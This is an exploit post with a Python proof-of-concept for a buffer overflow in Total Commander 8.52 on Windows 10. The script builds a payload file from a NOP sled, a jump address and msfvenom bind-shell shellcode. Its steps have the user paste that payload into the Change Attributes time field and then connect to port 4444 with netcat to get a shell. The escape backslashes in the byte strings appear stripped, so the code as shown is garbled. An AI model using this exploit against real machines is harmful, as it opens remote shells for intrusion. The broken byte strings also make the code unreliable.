Total Commander 8.52 Buffer Overflow (Windows 10)
Posted on 22 September 2015
#!/usr/bin/python # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow # AUTHOR: VIKRAMADITYA "-OPTIMUS" # Credits: Un_N0n # Date of Testing: 19th September 2015 # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe # Tested On : Windows 10 # Steps to Exploit # Step 1: Execute this python script # Step 2: This script will create a file called time.txt # Step 3: Copy the contents of time.txt file # Step 4: Now open Total Commander 8.52 # Step 5: Go To file > Change Attributes. # Step 6: In time field paste the contents of time.txt # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc file = open('time.txt' , 'wb'); buffer = "x90"*265 + "xfex24x76x6d" + "x90"*160 # 265 NOPS + Jmp eax + 160 NOPS + SHELLCODE + 10 NOPS # msfvenom -p windows/shell_bind_tcp -f c -b 'x00x0ax0d' buffer += ("xdbxcbxd9x74x24xf4x5ax31xc9xbex97xf8xc7x9dxb1" "x53x31x72x17x03x72x17x83x7dx04x25x68x7dx1dx28" "x93x7dxdex4dx1dx98xefx4dx79xe9x40x7ex09xbfx6c" "xf5x5fx2bxe6x7bx48x5cx4fx31xaex53x50x6ax92xf2" "xd2x71xc7xd4xebxb9x1ax15x2bxa7xd7x47xe4xa3x4a" "x77x81xfex56xfcxd9xefxdexe1xaax0excexb4xa1x48" "xd0x37x65xe1x59x2fx6axccx10xc4x58xbaxa2x0cx91" "x43x08x71x1dxb6x50xb6x9ax29x27xcexd8xd4x30x15" "xa2x02xb4x8dx04xc0x6ex69xb4x05xe8xfaxbaxe2x7e" "xa4xdexf5x53xdfxdbx7ex52x0fx6axc4x71x8bx36x9e" "x18x8ax92x71x24xccx7cx2dx80x87x91x3axb9xcaxfd" "x8fxf0xf4xfdx87x83x87xcfx08x38x0fx7cxc0xe6xc8" "x83xfbx5fx46x7ax04xa0x4fxb9x50xf0xe7x68xd9x9b" "xf7x95x0cx31xffx30xffx24x02x82xafxe8xacx6bxba" "xe6x93x8cxc5x2cxbcx25x38xcfxd3xe9xb5x29xb9x01" "x90xe2x55xe0xc7x3axc2x1bx22x13x64x53x24xa4x8b" "x64x62x82x1bxefx61x16x3axf0xafx3ex2bx67x25xaf" "x1ex19x3axfaxc8xbaxa9x61x08xb4xd1x3dx5fx91x24" "x34x35x0fx1exeex2bxd2xc6xc9xefx09x3bxd7xeexdc" "x07xf3xe0x18x87xbfx54xf5xdex69x02xb3x88xdbxfc" "x6dx66xb2x68xebx44x05xeexf4x80xf3x0ex44x7dx42" "x31x69xe9x42x4ax97x89xadx81x13xb9xe7x8bx32x52" "xaex5ex07x3fx51xb5x44x46xd2x3fx35xbdxcax4ax30" "xf9x4cxa7x48x92x38xc7xffx93x68") buffer += "x90" *10 file.write(buffer) file.close()
